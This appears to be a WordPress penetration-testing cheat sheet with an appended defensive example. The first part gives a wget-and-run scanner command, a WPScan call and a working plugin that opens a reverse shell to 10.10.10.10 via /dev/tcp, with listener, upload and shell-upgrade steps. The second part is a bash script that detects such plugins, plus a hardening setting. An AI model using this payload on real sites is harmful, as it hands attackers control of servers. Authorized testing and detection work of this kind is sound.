Find WordPress Applications and Run WPScan
wget https://raw.githubusercontent.com/Bhanunamikaze/PenTest-Scripts/main/Wordpress_Scanner.sh
bash Wordpress_Scanner.sh domains.txt
Note: update the WPScan API key in the script before running it
Scan WordPress for Vulnerabilities
- Log in or register on the WPScan website and generate an API key
wpscan --url <URL> --api-token <your WP Token Here> -o output.txt
WordPress Reverse Shell
#Create a new plugin as below - save it as somename.php
<?php
/**
* Plugin Name: New Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 0.1
* Author: Testing dude.. hope it works
* Author URI: http://www.domain.com
*/
exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.10.10/8080 0>&1'");
?>
#zip the file to somename.zip
#Start a listener
nc -nvlp 8080
# Log in to WordPress --> Plugins --> Add New Plugin --> upload the zip
# Activate the plugin, you should get a shell on your listener
#Get an Interactive Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Press Ctrl+Z to background the shell
stty raw -echo
fg
export TERM=xterm
export PS1="\e[0;32m[\u - \W]\$ \e[0m"
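Detecting the plugin upload above from the server side: the script below is an added example, not part of the original page, that flags plugin PHP files calling OS-command functions and marks them HIGH when a socket indicator such as /dev/tcp is also present. The function names, patterns and sample files are assumptions made for illustration, and the sample tree is constructed.

```bash
# Added example, not from the original page: triage wp-content/plugins for
# PHP files that run OS commands, as the uploaded plugin above does.

# PHP functions that spawn OS commands. The leading class skips method and
# suffixed calls such as $pdo->exec( or curl_exec(.
EXEC_RE='(^|[^A-Za-z0-9_>:$])(exec|system|shell_exec|passthru|popen|proc_open)[[:space:]]*\('
# Strings that tie a spawned shell to a network socket.
NET_RE='/dev/(tcp|udp)/|fsockopen[[:space:]]*\(|bash[[:space:]]+-i'

# scan_plugins DIR: print "HIGH <file>" when both patterns match,
# "REVIEW <file>" when only a command-execution call is present.
scan_plugins() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' \) \
        -exec grep -El -e "$EXEC_RE" {} + 2>/dev/null |
    while IFS= read -r f; do
        if grep -Eq -e "$NET_RE" "$f"; then
            printf 'HIGH %s\n' "$f"
        else
            printf 'REVIEW %s\n' "$f"
        fi
    done
}

# make_sample_tree DIR: write constructed sample plugins for a dry run.
make_sample_tree() {
    mkdir -p "$1/shellplug" "$1/backup" "$1/clean"
    # Constructed: same shape as the plugin body on this page (TEST-NET address).
    printf '%s\n' '<?php' \
        "exec(\"/bin/bash -c 'bash -i > /dev/tcp/192.0.2.10/8080 0>&1'\");" \
        > "$1/shellplug/shellplug.php"
    # Constructed: runs a command but carries no socket indicator.
    printf '%s\n' '<?php' 'system("tar czf /tmp/site.tgz uploads");' \
        > "$1/backup/backup.php"
    # Constructed: method and library calls that must not be flagged.
    printf '%s\n' '<?php' '$db->exec("DELETE FROM t");' '$r = curl_exec($ch);' \
        > "$1/clean/clean.php"
}

# Dry run on the constructed tree:
#   d=$(mktemp -d) && make_sample_tree "$d" && scan_plugins "$d"
# Real use:
#   scan_plugins /var/www/html/wp-content/plugins
```

Pattern matching misses obfuscated payloads, so treat a clean result as triage only. Setting define('DISALLOW_FILE_MODS', true); in wp-config.php disables plugin installation from the dashboard, which is the upload path used above.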
Source: https://www.hackingdream.net/2024/04/wordpress-penetration-testing.html